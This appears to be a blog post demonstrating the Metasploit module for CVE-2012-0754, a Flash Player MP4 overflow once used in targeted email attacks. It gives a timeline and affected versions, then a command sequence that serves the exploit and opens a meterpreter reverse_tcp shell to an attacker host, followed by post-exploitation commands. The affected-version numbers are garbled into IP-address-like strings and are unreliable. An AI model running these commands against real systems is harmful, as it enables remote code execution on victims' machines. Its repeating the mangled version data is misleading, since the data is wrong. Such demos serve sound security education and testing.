Vulnerability found by Alexander Gavrun from ZDI
Vulnerability reported to the vendor by ZDI the 2012-01-12
Coordinated public release of the vulnerability the 2012-02-15
Vulnerability found exploited in the wild by contagio the 2012-03-02
Metasploit PoC provided the 2012-03-07
PoC provided by :
Affected version(s) :
Adobe Flash Player 184.108.40.206 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems
Adobe Flash Player 220.127.116.11 and earlier versions for Android 4.x, and Adobe Flash Player 18.104.22.168 and earlier versions for Android 3.x and 2.x
Tested on Windows XP Pro SP3 with :
Adobe Flash Player 22.214.171.124
Internet Explorer 8
This module exploits a vulnerability found in Adobe Flash Player. By supplying a corrupt .mp4 file loaded by Flash, it is possible to gain arbitrary remote code execution under the context of the user. This vulnerability has been exploited in the wild as part of the “Iran’s Oil and Nuclear Situation.doc” e-mail attack.
use exploit/windows/browser/adobe_flash_mp4_cprt set SRVHOST 192.168.178.100 SET PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.100 exploit sysinfo getuid
1 thought on “CVE-2012-0754 Adobe Flash Player MP4 Overflow Metasploit Demo”
Comments are closed.